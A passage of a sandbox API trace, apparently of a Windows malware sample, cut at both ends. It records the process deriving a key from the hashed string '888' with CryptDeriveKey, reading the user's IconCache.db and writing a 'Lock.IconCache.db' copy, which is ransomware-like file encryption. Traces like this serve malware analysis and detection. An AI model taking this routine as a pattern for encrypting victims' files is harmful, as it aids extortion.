cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaab88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0168.730] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.730] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ab8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.730] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.731] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0168.731] CryptHashData (hHash=0x9e1fb8, pbData=0x2a71b58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0168.731] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.731] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.731] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.731] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaad50, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0168.731] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20b8) returned 1 [0168.731] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.731] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.731] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0168.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0168.733] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.733] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0168.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0168.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.734] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0168.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0168.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0168.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0168.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0168.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0168.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0168.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0168.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0168.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e9020 [0168.740] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0168.740] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0168.743] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x3141, lpOverlapped=0x0) returned 1 [0168.743] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0168.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13141) returned 0x2aaecf8 [0168.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e9020 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0168.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0168.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13141) returned 0x2ac1e48 [0168.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaecf8 | out: hHeap=0x2af0000) returned 1 [0168.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.749] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0168.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0168.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13141) returned 0x2aaecf8 [0168.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0168.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaecf8 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0168.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.751] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0168.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0168.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0168.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0168.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13141) returned 0x2aaecf8 [0168.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0168.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0168.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0168.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0168.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0168.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13141) returned 0x37c0048 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.756] 